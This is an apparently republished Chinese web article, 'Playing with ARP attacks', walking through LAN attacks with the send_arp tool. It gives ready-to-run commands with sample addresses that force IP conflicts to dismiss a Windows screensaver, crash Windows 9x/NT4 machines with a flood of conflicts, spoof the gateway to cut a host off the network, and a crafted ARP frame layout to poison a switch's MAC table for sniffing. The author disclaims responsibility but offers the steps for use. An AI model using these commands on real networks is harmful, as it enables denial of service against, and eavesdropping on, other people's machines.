网站运营
位置:首页>> 网站运营>> 玩转ARP攻击

玩转ARP攻击

 来源:asp之家 发布时间:2009-12-24 09:53:00 

标签:ARP攻击

我写这片文章只是想让你明白深刻理解某一协议的好处。高手免看。如果有人利用这片文章所做的一切事情,盖不负责。

网上关于ARP的资料已经很多了,就不用我都说了。 用某一位高手的话来说,“我们能做的事情很多,唯一受限制的是我们的创造力和想象力”。

ARP也是如此。

以下讨论的机子有

一个要攻击的机子:10.5.4.178

硬件地址:52:54:4C:98:EE:2F

我的机子: :10.5.3.69

硬件地址:52:54:4C:98:ED:C5

网关: 10.5.0.3

硬件地址:00:90:26:3D:0C:F3

一台交换机另一端口的机子:10.5.3.3

硬件地址:52:54:4C:98:ED:F7

一:用ARP破WINDOWS的屏保

原理:利用IP冲突的级别比屏保高,当有冲突时,就会跳出屏保。

关键:ARP包的数量适当。

[root@sztcww tools]# 。/send_arp 10.5.4.178 00:90:26:3D:0C:F3 \

10.5.4.178 52:54:4C:98:EE:2F 40

二:用ARP导致IP冲突,死机

原理:WINDOWS 9X,NT4在处理IP冲突时,处理不过来,导致死机。

注:对WINDOWS 2K,LINUX相当于flooding,只是比一般的FLOODING 有效的多。对LINUX,明显系统被拖慢。

[root@sztcww tools]# 。/send_arp 10.5.4.178 00:90:26:3D:0C:F3 \

10.5.4.178 52:54:4C:98:EE:2F 999999999

三:用ARP欺骗网关,可导致局域网的某台机子出不了网关。

原理:用ARP应答包去刷新对应着要使之出不去的机子。

[root@sztcww tools]# 。/send_arp 10.5.4.178 52:54:4C:98:EE:22 \

10.5.4.178 00:90:26:3D:0C:F3 1

注意:如果单单如上的命令,大概只能有效几秒钟,网关机子里的ARP高速缓存会被被攻击的机子正确刷新,于是只要。..

四:用ARP欺骗交换机,可监听到交换机另一端的机子。

可能需要修改一下send_arp.c,构造如下的数据包。

ethhdr

srchw:52:54:4C:98:ED:F7---》dsthw:FF:FF:FF:FF:FF:FF proto:806H

arphdr

hwtype:1 protol:800H hw_size:6 pro_size:4 op:1

s_ha:52:54:4C:98:ED:F7 s_ip:10.5.3.3

d_ha:00:00:00:00:00:00 d_ip:10.5.3.3

然后就可以sniffer了。

原理:

交换机是具有记忆MAC地址功能的,它维护一张MAC地址和它的口号表

所以你可以先来个ARP 欺骗,然后就可以监听了

不过需要指出,欺骗以后,同一个MAC地址就有两个端口号

yuange说,“这样其实就是一个竞争问题。”

好象ARP 以后,对整个网络会有点影响,不过我不敢确定

既然是竞争,所以监听也只能监听一部分,不象同一HUB下的监听。

对被监听者会有影响,因为他掉了一部分数据。

当然还有其他一些应用,需要其他技术的配合。


0
投稿

猜你喜欢

手机版 网站运营 asp之家 www.aspxhome.com